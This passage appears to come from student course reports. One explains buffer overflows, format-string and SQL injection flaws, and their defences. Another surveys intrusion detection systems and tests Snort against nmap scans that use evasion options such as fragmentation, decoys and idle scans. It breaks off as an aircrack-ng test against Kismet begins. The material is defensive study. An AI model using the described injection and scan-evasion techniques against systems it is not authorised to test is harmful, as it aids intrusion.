negative testing can be used to reveal the presence of some of the more common
vulnerabilities in code.
One specific type of negative testing is fuzz testing5, where the test data is
randomly generated. This saves time by automating the generation of test cases, but a
possible disadvantage of this method of testing is that rare boundary
cases that do not arise during normal operation of the program may go undetected. To
remedy this, special test cases targeting these boundary cases can be crafted and
used in conjunction with the random test inputs.
3
Common software vulnerabilities and security faults
3.1
Buffer Overflows
Buffer overflows are software faults that occur when the amount of data being written
to a buffer is more than what the buffer can contain. The data overflows the buffer and
overwrites the memory following the end of the buffer. When used as an attack
vector, the area of memory overrun beyond the buffer is usually chosen by
the attacker to have some special significance, for example containing system code
that he can overwrite or a return address which he can replace. The attacker then uses
this vulnerability to inject his own code into the memory area of interest, typically
with the aim of running his chosen programs with higher privileges.
The C programming language is particularly susceptible to buffer overflows,
as it does not bounds-check buffers and because many of the functions provided by
the standard C library are unsafe: the programmer needs to explicitly confirm that
the size of the data being read is always smaller than the buffer it will be written to6.
Some of the unsafe library functions are the strcpy, strcat, gets and sprintf functions7,8.
The detection techniques outlined in the previous sections can be applied to
detect the presence of buffer overflow vulnerabilities. For example, the use of
these unsafe functions can be spotted during code review, and the code can be
rewritten to use safe versions of these functions, if available, or rewritten to use the
functions in a safe manner. This process can also be automated through the use of
static code analysers or other similar tools. Splint9, a tool for statically checking C
programs for security vulnerabilities and coding mistakes, can be configured to detect
whether the unsafe library functions are used. If these functions absolutely have to be
used, Splint can also be used in conjunction with annotated pre- and post-conditions
in the source code to detect whether the function calls are being made in a safe manner.
3.2
Failing to handle invalid inputs
The failure to handle, or the improper handling of, invalid inputs is a recipe for disaster. Here
we outline two specific software vulnerabilities in this class of software faults,
both of which stem from, or can be exploited through, the mishandling of specially
crafted user input.
3.2.1 Uncontrolled Format String
Most programming languages include functions to format data for output. In most
languages, the formatting information is described using some sort of string, called
the format string. The vulnerability arises when programmers use data from external,
untrusted sources directly as the format string10. As a result, attackers can enter format
strings as input to the program, causing many problems.
The C programming language is one of the languages that use formatting
strings, in the printf family of functions, making it susceptible to this type of exploit.
Take for example the statement,
printf(string_from_untrusted_user);
By using the format specifier “%x” in a format string that is input into the program,
the attacker can inspect the program stack 4 bytes at a time. Another format specifier
with a potentially dangerous function is “%n”. Using this particular format specifier,
the attacker is able to write 4 bytes to the stack11. Thus using a combination of the two
format specifiers, the attacker can insert his own code into the stack to be executed or
replace a return address to point to some other code in the system.
During code review, one could simply check for the misuse of the formatted
output printing functions. Static code analysers such as Splint, mentioned above, are
also able to detect improper usage of these functions. Negative testing can also be used
in black-box situations where the code is unavailable: testers can simply pass potentially
unsafe format specifiers, such as the "%x" C vulnerability detailed above, and
check whether hexadecimal values are returned.
3.2.2 SQL Injections
Nowadays, it is common to find programs organizing their data through SQL, a standard
language for querying databases. This opens up a new way to exploit a program that does not properly
validate user input.
For example, a program may ask the user for authentication before displaying
sensitive data. If the program uses SQL to check the user's credentials but fails to
validate the input, a successful SQL injection attack may allow the attacker to gain
unauthorized access to the sensitive data. Suppose the program asks for the user's
name and password, saves them into the variables $name and $password, and
concatenates the information provided with a string literal to construct the following SQL
statement to pass to the SQL interpreter: "Select * from user where name=$name
and password=$password". This use of string concatenation allows the attacker to
pass his own SQL queries to the system to be executed. With a little guesswork, the
attacker will be able to access, modify and delete data in the database.
When doing a code review, portions of code that fit the following pattern are
vulnerable to SQL injection: the code takes user input, does not validate the input,
uses the input directly to query the database, and uses string concatenation to build the
SQL query. Negative testing by supplying malformed inputs to the program also
reveals whether the program is vulnerable to such an exploit. Of course, all of this only
applies to code that interfaces with a database; any program that does not is
obviously free of such vulnerabilities.
4 Other methods to ensure that programs do not damage the system
4.1 Checking if the program is run with the lowest possible privileges
Programs such as web servers or daemons should always run under the lowest
possible privilege level. This reduces the damage if the program is compromised by a
malicious attack. For example, the Apache HTTP Server can be configured to refuse
to start if it detects it is being run with administrator privilege, because a restricted
user privilege is sufficient for the server to perform its tasks. Ensuring a program
implements such a privilege check helps reduce the damage to the system, should an
attack be successful.
4.2 Running the program in a sandbox
A sandbox is a common mechanism for separating a program from the actual system.
It is a specific example of virtualization. Its usage is widespread among all major
anti-virus software for the detection of malicious programs. By running the program
inside a sandbox, the resources the program uses are tightly controlled by the
sandboxing software. Therefore, when the running program is compromised by an
attack, the damage will not extend beyond the sandbox and can be easily identified
for further analysis.
A typical example of a sandbox for vulnerability testing is to launch the
program inside virtual machine software such as Oracle VirtualBox, which can
closely monitor the system resources utilized, I/O patterns, network access and so on.
With the statistics collected from the running program, the access pattern can be
analyzed and any suspicious behaviour identified.
4.3 Checking If the System Uses Data Execution Prevention
Many modern operating systems such as Microsoft Windows have a security feature
called Data Execution Prevention [12], which prevents the data section of a protected
program from being executed. Because a typical buffer overflow attack involves
overwriting the data section of the victim program with malicious instructions and
tricking the victim program into jumping into these instructions, ensuring that the
program under testing utilizes this technology greatly reduces the chance of a
successful attack on the program.
4.4 Checking That the System Uses Address Space Layout Randomization
Another security feature common to modern operating systems is Address Space
Layout Randomization (ASLR). It randomizes the addresses of system data structures
and the positions of system libraries in a process’s address space. This complicates
remote code execution: a malicious attacker trying to inject code will have a hard
time predicting the address of a system library or accessing system data structures.
Furthermore, a wrong prediction of the address will almost always crash the attacked
process, preventing the attacker from simply trying another address prediction. For
example [13], since Windows Vista introduced ASLR, many attack techniques that
used to work well in Windows XP have only a 1 in 256 chance of working on the new
system. Any trial on the other 255 wrong memory locations will crash the attacked
process, preventing the attack from trying other possibilities as well as alerting users
to the unusual crashing behaviour, which might lead to the discovery of the attacker.
4.5 Ensuring That the Program Does Not Use Injected Compromised Code By Mistake
A common technique to inject malicious code is through the loading of an unintended
dynamic library. For example, on Windows, a malicious program may inject a
carefully crafted DLL (Dynamic-Link Library) into the address space of the victim
process so that the attacking code resides in the same address space, i.e. it has
access to all the data structures and is able to perform arbitrary operations at the
privilege level of the victim process. In an article [14] written by Robert Kuster, the
author describes in detail three ways to inject foreign instructions into a target process.
Amongst the three methods, namely Windows Hooks, CreateRemoteThread &
LoadLibrary and CreateRemoteThread & WriteProcessMemory, two are
achieved through the use of a custom DLL. Therefore, if a program does not check for
suspicious loaded libraries during run-time, it could easily leak sensitive data to the
attacker or run arbitrary injected code at its current process privilege and hence
potentially damage the rest of the system.
One way to prevent code injection through foreign libraries is to keep a
whitelist of the names and hashes of the authorized libraries the program intends to
use. Whenever a library is loaded, the program can check whether it is authorized by
looking it up in the whitelist, and immediately unload any unauthorized library.
5 Conclusion
The methods and techniques we have investigated are by no means exhaustive; the
myriad of vulnerability detection and prevention techniques seems to be limited only
by a reviewer’s time and patience. Thus we have chosen only the ones that we
consider the most relevant to this course. As more and more commercial code is
written, new attack vectors are continuously being discovered and an equal number of
mitigation techniques end up being proposed and developed. We also note that none
of these techniques, indeed no single technique ever, is a magic bullet capable of
securing a program or system. A combination of vulnerability detection and
mitigation should always be used to secure systems and the programs running on
them.
References
1. Pfleeger, S., and Hatton, L. "Investigating the Influence of Formal Methods." IEEE Computer, v30 n2, Feb 1997.
2. Jones, T. Applied Software Measurement, McGraw-Hill, 1991.
3. Johnson, S. Lint, a C program checker. Computer Science Technical Report 65, Bell Laboratories, December 1977.
4. Beizer, Boris. Software Testing Techniques, van Nostrand Reinhold, 1990.
5. B.P. Miller, D. Koski, C.P. Lee, V. Maganty, R. Murthy, A. Natarajan, and J. Steidl, "Fuzz Revisited: A Re-examination of the Reliability of UNIX Utilities and Services", Computer Sciences Technical Report #1268, University of Wisconsin-Madison, April 1995.
6. ISO/IEC 9899 International Standard. Programming Languages – C. December 1999. Approved by ANSI May 2000.
7. http://www.gnu.org/software/libc/manual/html_node/Copying-and-Concatenation.html
8. http://www.gnu.org/software/libc/manual/html_node/Formatted-Output-Functions.html
9. David Larochelle and David Evans. 2001. Statically detecting likely buffer overflow vulnerabilities. In Proceedings of the 10th conference on USENIX Security Symposium - Volume 10 (SSYM'01), Vol. 10. USENIX Association, Berkeley, CA, USA, 14-14.
10. http://www.dwheeler.com/essays/write_it_secure_1.html
11. http://www.gnu.org/software/libc/manual/html_node/Table-of-Output-Conversions.html
12. A detailed description of the Data Execution Prevention (DEP) feature in Windows XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows Server 2003. http://support.microsoft.com/kb/875352
13. http://netsecurity.about.com/od/quicktips/qt/whatisaslr.htm
14. Robert Kuster. Three Ways to Inject Your Code into Another Process. http://www.codeproject.com/KB/threads/winspy.aspx
Intrusion and Prevention System Analysis
Tran Dung – U096942M, Tran Cong Hoang – U096948
Abstract. Intrusion detection is the process of monitoring and analyzing a computer system or
network for potential incidents, which include threats or violations of security policies or
practices. Nowadays, when most networks are interconnected, attackers can easily exploit
many systems' vulnerabilities and make use of them to attack these systems. Detecting,
recording and deterring these actions become more and more important, and therefore
intrusion detection and prevention systems (IDPS) are becoming increasingly essential to any
system's security suite. In this research, we discuss several types of IDPS (e.g. their
components and capabilities). In the end, we also survey a range of available intrusion
detection systems, each from a different category, by carrying out several sample attacks on our
systems, and analyze the results collected.
1 Introduction
An intrusion detection and prevention system (IDPS) is software capable of
monitoring a network or a machine to detect malicious activities and of performing
certain actions to stop possible incidents.
Every IDPS has the following typical components:
 Sensor or Agent. The responsibility of this device is to monitor and optionally
analyze activities.
 Management server. This device’s main responsibility is to perform analysis on
received information from all Sensors or Agents, sometimes in a way that each
individual Sensor or Agent cannot do. For example, it can detect correlation which
is the relationship among event information from multiple Sensors or Agents (e.g.
packets from the same IP source, etc.).
 Database server (usually optional). This device simply stores information.
 Console. This program is an interface through which IDPS administrators perform
administrative work such as configuring Sensors/Agents, updating the IDPS, etc.
Currently, there are a lot of intrusion detection systems available, such as
Snort, Kismet or Ossec. There are two main ways to categorize them: according to
their detection methods (Signature-based detection, Anomaly-based Detection,
Stateful Protocol Analysis), or according to the way they are deployed and the events
they monitor: Network-based, Wireless, Network Behavior Analysis and Host-based.
In the following parts, we will follow the latter categorization to analyze current
IDPS technology. We will also focus only on the Sensor/Agent component of
each type of IDPS, since it is the main feature that distinguishes the different types of
IDPS from each other. In addition, high-level descriptions of the capabilities of each
type of IDPS will also be discussed.
2 Network-based IDPS
2.1 Introduction
Network-based IDPS is the type of IDPS that monitors and analyzes network activity
on one or more network segments for suspicious activity. It is often deployed at
boundaries between networks, such as positions near border firewalls or border
routers.
2.2 Sensors
Each IDPS sensor monitors traffic on one or more network segments. Sensors are
deployed on network interface cards that are placed into promiscuous mode, which
means that they will accept all incoming packets that they see on the network,
regardless of the destination. Most IDPSs use multiple sensors; some even use
hundreds. A sensor belongs to one of two types: software only or appliance. The
former means only a software solution is provided, while the latter means the sensor
comprises hardware, software and even a specialized hardened OS. The appliance
type is optimized for the sensor task, so it is much more capable than the
software-only solution.
Sensors can be deployed in one of two modes: inline or passive. In inline
mode the sensor is deployed so that all traffic it monitors must pass through it, while
in passive mode the sensor only monitors a copy of the traffic. Inline sensors are
often placed directly at special points in the network flow, at the divisions between
networks (similar to firewalls), such as the border between the external and internal
networks. Passive sensors are deployed with the use of either a spanning port or a
network tap. The spanning port is a special port of a switch that can see all packets
passing through the switch; when the sensor is connected to this port, it receives
copies of the traffic going through the switch and monitors them. The network tap is
a special device which connects the sensor to the network and provides the sensor
with a copy of the packets going through the network. Passive sensors can also
receive copied packets indirectly, sent from an IDS load balancer that aggregates
copied packets and distributes them among passive sensors.
2.3 Security capabilities
Detection capabilities. Traditionally, network-based IDPS uses signature-based
detection for detecting threats. This means the IDPS compares the content of each
item (network packet or log entry) against known threat patterns (mostly using simple
comparison methods) to identify possible threats. For example, an email containing
an attached .exe file could possibly carry malware or a virus. This method is effective
at identifying known threats, but it has a major weakness: it is very ineffective against
unknown threats, or threats that make use of evasion techniques. The types of event
commonly discovered by network-based IDPS include the following:
 Application layer attacks (e.g., banner grabbing, format string attacks, password
guessing, malware transmission, etc). Several application protocols such as DHCP,
HTTP, FTP, etc… can be analyzed.
 Transport layer attacks (e.g., port scans, unusual packet fragmentation, SYN
floods, etc.). The most commonly analyzed transport layer protocols are TCP and
UDP.
 Network layer attacks (e.g. spoofed IPs, illegal IP headers, etc.). The most
commonly analyzed network layer protocols are ICMP, IPv4 and IGMP. Some
network-based solutions also support the IPv6 protocol.
 Unexpected application services (e.g., tunneled protocols, backdoors, etc.). These
threats can be detected using Stateful Protocol Analysis or Anomaly-based
methods.
 Policy violations (e.g. blacklisted Web sites or application protocols, etc.)
Even though network-based IDPS can discover a wide range of malicious
activities, they do have a number of serious limitations. One of the most important
is that they have little understanding of many network protocols and cannot track the
state of complex communications. For example, many IDPS using this method cannot
pair a request with the corresponding response, or remember previous requests when
processing the current request. This prevents signature-based detection methods from
detecting attacks that comprise multiple events if no single event clearly signals an
attack. Since a network-based IDPS often needs to monitor a huge amount of traffic,
and because of the inherent problems with this detection method, this type of IDPS
often generates many false positives, as well as false negatives.
Newer network-based IDPS use a combination of detection methods
(Signature-based analysis, Stateful Protocol Analysis, etc.) to increase the accuracy of
their detection, as well as reduce the number of false alerts and false positives.
3 Wireless IDPS
3.1 Introduction
According to figures published on the website of CTIA (The Wireless Association),
as of June 2011, there are around 327.6 million wireless subscribers in the U.S. alone.
It is clear that Wireless technology has been revolutionizing the way we work and
live. Wireless solutions such as Radio Frequency Identification (RFID) tags, for
instance, are improving luggage operations at many airports, while everyone is able to
send and receive emails from their mobile devices.
As wireless technology has gained popularity, so have attacks against them. In
fact, wireless networks are not only vulnerable to TCP/IP based attacks which are
native to wired networks; they also suffer from a wide range of 802.11 specific
threats. Unfortunately, traditional IDPS solutions are at times unable to detect or
prevent attacks of the latter kind. The reason is that traditional IDPS concentrate
more on threats at layer 3 and above. This implicit trust of layers 1 and 2 results from
the fact that to get access to the cables or data points of a wired network, attackers
must either defeat the physical security (e.g. guards, locks) or, in various cases, be an
employee. However, wireless technology brought about a new situation. To be
precise, wireless networks are not only susceptible to all the same attacks at layer 3
and above, but they are also vulnerable to many threats at layers 1 and 2. This is
unavoidable because the technology uses electromagnetic spectrum in the radio
frequency range as the medium over which computers gain access to the network. In
other words, layer 1 and layer 2 can be easily affected by anyone within the radio
frequency range of the network and traditional IDPS usually does not monitor for
these kinds of threats.
For some time, WLANs had very poor security on a wide-open medium.
However, as new and improved encryption schemes were invented, traditional IDPS
have also been improved to help tackle this problem. In the following parts, we will
focus on the sensors of wireless IDPS and then discuss the security capabilities of the
technology.
3.2 Sensors
The main components in a wireless IDPS are pretty much the same as in a
network-based IDPS: consoles, sensors, management servers and database servers
(optional). Other than the sensors, all of the components perform essentially the same
roles for both kinds of IDPS. In a wireless IDPS, sensors have the same basic
functionalities as network-based IDPS sensors. However, because of the complex
nature of monitoring wireless communications, wireless sensors function quite
differently.
Unlike its network-based cousin which can monitor all packets on the network,
a wireless IDPS works on samples of traffic. There are several frequency bands to
monitor and each band is divided into many channels. Since it is not possible to
monitor all packets on a band at the same time, a sensor must handle a single channel
at a time. The longer a sensor stays on one channel, the more likely it is to miss
malicious activity happening on the other channels. Typically, a sensor is configured
to jump among channels very frequently, such that it can monitor each channel a few
times per second. Many systems use specialized sensors that have several radios and
high-power antennas, with each radio-and-antenna pair monitoring a different
channel. Some IDPSs further coordinate scanning activities among sensors with
overlapping ranges so that each sensor does not have to monitor too many channels.
In general, there are 3 main types of wireless sensors:
 Dedicated. Dedicated sensors usually function passively in a radio frequency
monitoring mode to sniff wireless traffic. Some dedicated sensors perform analysis
on their own, while others simply forward the received packets to the management
server. One important characteristic of dedicated sensors is that they do not pass
packets from source to destination.
 Bundled with an Access Point (AP). Several manufacturers have added IDPS
functionalities to their products. A bundled AP may provide weaker detection
capability because it has to switch back and forth between monitoring the network
for threats and providing network access. If only a single band or channel needs to
be monitored, bundled APs provide acceptable security and network availability.
 Bundled with a Switch. This solution is similar to a bundled AP. However,
wireless bundled switches are usually not as good as bundled APs or dedicated
sensors at detecting threats.
Because of the nature of wireless technology, choosing where to put sensors
for a wireless IDPS is a fundamentally different problem from doing so for other
types of IDPS. In general, wireless sensors should be deployed such that they cover
the whole radio frequency range of the WLANs. At times, to detect rogue APs and
ad-hoc WLANs, sensors are also located where there should be no wireless traffic,
and configured to monitor channels or bands that should not be used.
3.3 Security capabilities
Detection capabilities. Wireless IDPS do not analyze communications at higher
levels (e.g. IP addresses). Instead, they focus on the lower-level IEEE 802.11
protocol communications and are capable of detecting misconfigurations, attacks and
policy violations at the WLAN protocol level.
As a matter of fact, wireless IDPS can detect a wide range of malicious events.
The most commonly detected types of events include the following:
 Unauthorized devices. Using the information gathering capabilities, most wireless
IDPS are capable of detecting unauthorized WLANs, rogue APs and unauthorized
stations.
 Poorly secured devices. Again, using the information gathering capabilities, most
wireless IDPS can sort out APs and stations which are misconfigured or are using
weak WLAN protocols or protocol implementations.
 Unusual usage patterns. Some sensors can adopt anomaly-based detection
methods to sort out unusual usage patterns.
 Wireless network scans. At times, attackers use scanners to discover unsecured or
poorly secured WLANs. Wireless sensors can effectively detect the use of such
scanners in the network, provided that the scanners generate some wireless traffic
during the scanning process. However, wireless sensors are not capable of detecting
passive devices that only monitor and analyze observed traffic.
 Denial of service (DoS) attacks and conditions. Wireless IDPS can usually detect
DoS attacks using Stateful Protocol Analysis and Anomaly-based detection
methods, which can check if observed amount of traffic is consistent with the
expected amount. At times, DoS attacks can be discovered by simply counting the
number of events during periods of time and alerting when this number exceeds the
threshold.
 Impersonation and man-in-the-middle attacks.
Most wireless sensors can further determine the physical location of an
attacker by estimating the attacker’s approximate distance from multiple sensors
and then calculating the coordinates.
Compared to other types of IDPS, due to its limited scope (analyzing wireless
protocols), wireless IDPS is, in general, more accurate. False positives are most likely
produced by anomaly-based detection methods, especially if threshold values are not
well configured.
On the other hand, wireless IDPS do have some serious limitations, such as
being unable to detect certain wireless protocol threats. One of the most important
limitations is that wireless IDPS are vulnerable to evasion techniques and susceptible
to attacks against the IDPS themselves. The same DoS attacks (both physical and
logical) which aim to disrupt WLANs can also affect the sensors. For example, an
attacker can get close to sensors located in public areas (e.g. hallways) and secretly
jam them.
Prevention capabilities. Wireless sensors usually offer two types of prevention
capabilities:
 Wireless. Some sensors are capable of sending messages through the air to the end
points, telling them to terminate connections with a rogue or misconfigured station
or AP.
 Wired. Some sensors are capable of instructing switches on the wired network to
block traffic involving a specific AP or station based on the device’s switch port or
MAC address.
One important point to note is that while a sensor is sending signals to
terminate connections, it may not be able to continue its monitoring functions until
the prevention action is finished. To solve this issue, some sensors are built with two
radios – one for monitoring and the other for enforcing prevention actions.
4 Network Behavior Analysis IDPS
4.1 Introduction
Network Behavior Analysis (NBA) IDPS is the type of IDPS that examines and
analyzes network traffic to identify threats that generate unusual traffic flows, such as
distributed denial of service (DDoS) attacks, certain forms of malware, and policy
violations.
4.2 Sensors
Similar to other types, an NBA IDPS is often comprised of sensors, consoles and,
optionally, a management server. They are often deployed as an appliance (both
software and hardware in one solution). Some NBA IDPSs monitor the network
directly, just like network-based IDPS. Others do not monitor directly, but rather
monitor the flow data provided by routers or other networking devices (such as the
NetFlow flow data provided by Cisco routers).
Just like network-based IDPS, NBA IDPS can be integrated into the
organization's standard networks, or they can be deployed using a separate
management network. Like network-based IDPS sensors, which can be deployed in
inline or passive mode, NBA IDPS can also be deployed in these two modes.
However, most NBA IDPSs are deployed in passive mode, also with the help of
devices such as a switch spanning port or a network tap. They are often deployed at
special network locations, such as the borders between network segments or at
important network segments. The minority deployed in inline mode sit between
the firewall and the Internet border router to deal with incoming attacks that could
overwhelm the firewall.
4.3 Security capabilities
Detection capabilities. Since NBA IDPS is used to examine network flows, its
detection mechanism is usually based on anomaly-based detection, along with some
stateful protocol analysis techniques, rather than on any signature-based detection
capability. Anomaly-based detection means the NBA IDPS tries to generate a profile
of what is considered normal behavior, and then compares the behaviors observed in
the network flow with that normal profile to detect anomalous behaviors. When first
deployed, it undergoes a training period to gather information about normal user
behavior in the network and build up its profile. After the training period, the profiles
may be fixed (static) or adjusted constantly as additional events are observed
(dynamic). Static profiles have the problem that they need to be changed periodically,
because network conditions keep changing. Dynamic profiles do not suffer from this
problem, but they are susceptible to being poisoned by attackers: an attacker can
perform small operations continuously until the profiles are updated to include the
malicious behavior.
Since NBA IDPS are based mainly on network flow data and anomaly-based
detection, they are most effective and accurate when dealing with attacks that
generate a large amount of network traffic, such as DoS and DDoS attacks. As
mentioned, they have several weaknesses when dealing with small-scale attacks over
a long time. If their sensitivity is increased so that they can detect smaller-scale
attacks, this can lead to an increase in the number of false positives, in which they
mistakenly detect harmless changes to the network (such as a network upgrade or a
host changing location) as potential threats. The detection accuracy can also vary
over time, and periodic updates to their profiles are required to maintain their
detection efficiency.
In addition, NBA IDPS suffer from some other limitations. One of the most
important is the delay in their detection. Since many IDS of this type have to wait for
data flowing from routers to reach them, and then wait until the anomaly reaches a
certain level, there is an inherent delay in their detection capability. The delay may be
small (1-2 minutes), but it may also be long (10-15 minutes). Sometimes an attack is
detected only after it has already damaged the system.
Some of the commercial Network Behavior Analysis intrusion detection and
prevention systems available are Cisco Guard and Cisco Traffic Anomaly Detector by
Cisco Systems (http://www.cisco.com/en/US/products/hw/vpndevc/index.html),
Arbor Peakflow X by Arbor Networks
(http://www.arbornetworks.com/products_x.php), and OrcaFlow by Cetacean
Networks (http://www.orcaflow.ca/features-overview.php).
5 Host-based IDPS
5.1 Introduction
In the IDPS family, host-based IDPS is the eldest brother who was the first to be
developed and implemented. Originally, its mission was to protect the mainframe
computer where communication with the outside world was infrequent.
Typically, a host-based IDPS is installed directly on a computer system.
Once successfully deployed, it monitors the state of the host as well as all events
occurring within that host for malicious activity. Some examples of what a host-based
IDPS might monitor are system logs, changes to files and directories, running
processes, system and application configuration changes, and wired or wireless
traffic (only for that host). Since the protected system usually resides on the trusted
side of the network, host-based IDPS are, in fact, close to the internal authenticated
users. This proximity makes them highly effective at detecting insider threats such as
disgruntled employees and corporate spies. If one of these users attempts to perform
unauthorized actions, a host-based IDPS will be able to detect them and collect the
most relevant information in the quickest possible manner.
On the down side, if there are some hundreds or thousands of endpoints in a
big network, collecting and aggregating information separately from each individual
computer may not be very efficient or effective. Moreover, if an attacker manages to
turn off the data collection function on a machine, the host-based IDPS on that
computer may become useless if there is no backup.
In the following section, we discuss the agent, one of the main components of
host-based IDPS, and then study the security capabilities of the technology.
5.2 Agents
Just like its siblings, a host-based IDPS’s main components include consoles,
management servers and database servers (optional). However, instead of using a
so-called sensor, host-based IDPS have detection software called agents installed on
the machines of interest (e.g. critical hosts such as publicly accessible servers and
servers containing important data). Each agent monitors activity on a single host and
transmits data to a management server for analysis. At times, agents will also
perform certain prevention actions if required.
As a matter of fact, instead of installing agents on individual machines, many
host-based IDPS use dedicated gadgets running agent software. Each gadget is
configured to monitor traffic involving a specific host. Technically, this type of IDPS
is more like a network-based IDPS. However, instead of monitoring the whole
network, they concentrate on a particular machine. Besides, since these gadgets also
function in the same or similar ways as the host-based agents, IDPS products using
gadget-based agents are usually considered host-based. In certain cases, such as when
normal agents negatively affect the performance of the monitored host, gadget-based
agents prove to be quite necessary.
To provide IDPS capabilities, most agents use a shim – a layer of code put
between existing layers of code – to capture and analyze data at a point where it
would otherwise be transmitted between two pieces of code. On the other hand, there
are also agents which do not use a shim. Although these agents are less intrusive to
the host, they tend to be less effective at detecting malicious activities and often do
not have prevention capabilities.
Typically, agents are designed to monitor one of the following:
 A server. Common applications can also be monitored together with the operating
system.
 A client station. Agents of this type usually monitor the user’s operating system as
well as common applications such as browsers or email clients.
 An application service. Some agents only monitor a particular application
service, such as a Web server program. They are usually called application-based IDPSs.
5.3
Security capabilities
Detection capabilities. Depending on the techniques that a host-based IDPS
employs, the types of events it can detect vary widely. Some commonly used techniques
include the following:
 Code analysis. A number of techniques of this type are quite useful at detecting
malware and can also prevent threats such as those that would permit unauthorized
code execution or escalation of privileges. Agents may analyze attempts to execute
code by using one of the following techniques:
 Code behavior analysis. Before code is brought into the production
system, it can first be analyzed in a sandbox environment to look for
malicious behaviors, by comparing it to profiles or rules of known good and
bad behaviors.
 Buffer overflow detection. Attempts to perform stack/heap overflow attacks
can be discovered by searching for typical characteristics, such as certain
code sequences.
 System call monitoring. Most agents have sufficient knowledge to decide
which applications or processes should call which other applications or
processes, or perform which actions. For example, agents can forbid certain
drivers from being loaded, which can prevent threats such as rootkits.
 Application and library lists. An agent is capable of forbidding users or
processes from loading certain (version of) applications and libraries.
 Network traffic analysis. Some host-based IDPSs can analyze both wired and
wireless traffic. This technique also allows them to extract files sent by
applications such as email clients to look for malware.
 Network traffic filtering. Agents often set up a host-based firewall to sort out
certain incoming/outgoing traffic for each application on the host.
 Filesystem monitoring. One important thing to note about techniques of this kind
is that some host-based IDPSs base their monitoring on filenames. In other words, if
an attacker changes filenames, these techniques may be useless. In general,
common techniques include the following:
 File integrity checking. Agents usually generate message digests or
checksums for critical files periodically and compare them to identify
changes that have already been made, e.g. by a Trojan horse.
 File attribute checking. Agents also routinely check the attributes (e.g.
ownership, permissions, etc.) of important files to identify changes that
have already been made.
 File access attempts. Agents using filesystem shims can detect and stop
malicious attempts to access important files.
 Log analysis. Most agents can analyze OS and applications’ logs to look for
malicious activities.
 Network configuration monitoring. Some agents are capable of monitoring a
machine's current network configuration (including wired, wireless, virtual private
network, etc.) and discovering any changes made to it.
One important point to note is that because a host-based IDPS sits
directly on a machine, it can go deeper into that particular system's details and
dig out information that its sibling IDPSs may not be able to. This advantage results
in several unique strengths of host-based IDPSs:
 Attack verification. Since the host-based IDPS has direct access to a wide range
of logs containing critical information about events that have actually occurred, it
can easily check whether an attack or exploit was successful, or would have succeeded
if not stopped. Based on this knowledge, adequate prevention actions can be
selected and alerts can be assigned proper priorities.
 Encrypted and switched environments. In a switched network, there may be
numerous segments or separate collision domains. Since the host-based IDPS's
siblings, like the network-based IDPS, can only monitor one segment at a time, it may
be difficult for them to achieve the required coverage. As for encryption, if packets
are encrypted with certain types of encryption schemes, the host-based IDPS's siblings
may be blind to certain threats. Host-based IDPSs are, on the other hand, generally
immune to these problems. To overcome the switching issue, host-based IDPSs can be
installed on as many critical hosts as needed. Besides, since encryption has no
impact on what is recorded in the logs, host-based IDPSs will be able to detect
threats regardless of the encryption schemes being used.
 No additional hardware. If gadget-based agents are not required, no additional
hardware is needed to run the host-based IDPS. This can result in great
cost savings in maintenance and management.
Accurate detection is quite challenging for host-based IDPSs because a
number of the detection techniques employed, such as log analysis, are not aware of the
context in which correctly detected events happened. For example, a machine may
be restarted or have a new application installed. These activities could be malicious in
nature, or they could be normal operations such as maintenance. In general, if a host-based
IDPS employs a bigger range of techniques, it will receive more
information about the occurring events. As a result, the IDPS has a clearer
picture of the situation and tends to deliver more accurate detection.
Just like their siblings, host-based IDPSs have their own significant
drawbacks. One of the most important issues is the delay of alerts. Even though alerts
are generated as soon as malicious attempts are discovered, these attempts have
usually already happened. Another limitation involves the usage of host resources
(e.g. memory, processor, storage). At times, agents' operations, especially the shims,
can slow down the host's processes. In addition, installing an agent can cause existing
host security controls (e.g. firewalls) to be disabled if those controls are
determined to function similarly to the agent.
Prevention capabilities. In general, most of the techniques employed by host-based
IDSs/IPSs to detect threats can also help prevent malicious attempts from being
successful. For example, a code analysis technique can prevent code (e.g. malware)
from being executed. Another example is that filesystem monitoring techniques
can help prevent critical files from being accessed, modified, replaced or deleted,
which can effectively mitigate malware and Trojan horse issues.
On the other hand, some of the techniques like log analysis cannot help
prevent malicious activities because they can only discover harmful events after they
have already happened.
6
Our experiments
6.1
SNORT (a network-based system)
In the first experiment, our system under test is a box running Windows 7
Professional, and Snort is the IDS being tested.
Port scans. To perform the attack, we used the popular port scanning program
nmap. We carried out two series of scans. Each series used three different scan
methods: a scan for open ports (option -Pn), a scan for OS detection (-O), and a scan
for service and application version detection (-sV). For the first series,
the scans were performed without using any detection evasion techniques. For the
second series, we tried different evasion techniques, including:
 Fragmenting the packets using -f.
 Setting the MTU (maximum transmission unit) using --mtu.
 Using random data lengths (--data-length).
 Using a decoy host with -D.
 Reducing the sending speed (using -T).
 Idle scanning (-sI).
The results are presented in the following table. Every alert raised was of the
same type: PSNG_TCP_PORTSWEEP [**] [Classification: Attempted Information Leak]
[Priority: 2].

#  Target for detecting        Option  Evasion technique                          Succeeded  Alerted
1  Open port                   -Pn     N/A                                        Yes        Yes
   OS                          -O      N/A                                        Yes        Yes
   Services and apps version   -sV     N/A                                        Yes        Yes
2  Open port                   -Pn     TCP SYN scan (-sS)                         Yes        Yes
   Open port                   -Pn     Decoy (-D)                                 Yes        Yes
   Open port                   -Pn     Packet fragmentation and MTU (-f, --mtu)   Yes        Yes
   Open port                   -Pn     Mixed of previous techniques               Yes        Yes
   Open port                   -Pn     Idle scan (-sI)                            No         N/A
   OS                          -O      Mixed of previous techniques               Yes        Yes
   Services and apps version   -sV     Mixed of previous techniques               Yes        Yes
   OS and services/apps ver.   -O -sV  Mixed of previous techniques               Yes        Yes
Analysis. From the table, we can see that Snort can detect almost all common types
of port scanning, even when the scanning is performed using evasion techniques. The
source of the attack was detected in all cases. The theoretically stealthiest type of
scanning (idle scanning) is quite hard to carry out, since it requires the IP ID
sequence of the idle host to be incremental, which is not very likely to happen
nowadays. We tried this attack for several hours without success.
From this experiment, we can see that in a simple environment, for personal
use, Snort performs flawlessly against port scanning techniques. However, in a real
business environment, where the number of packets flowing through the network
could be millions or even billions per second, the chance of an IDPS like
Snort missing a potentially harmful packet remains. Therefore, scaling up the
IDS to suit the organization's needs is really important to ensure security for
the system.
6.2
Kismet (Wireless intrusion detection system)
In our tests, we tried to carry out some attacks on wireless networks encrypted with
WEP and WPA keys. The attacks were carried out with the very popular wireless key
cracking suite aircrack-ng (www.aircrack-ng.org/). The wireless IDPS used here is
Kismet (www.kismetwireless.net/).
To perform the attack, we use a host machine to broadcast wireless ad hoc
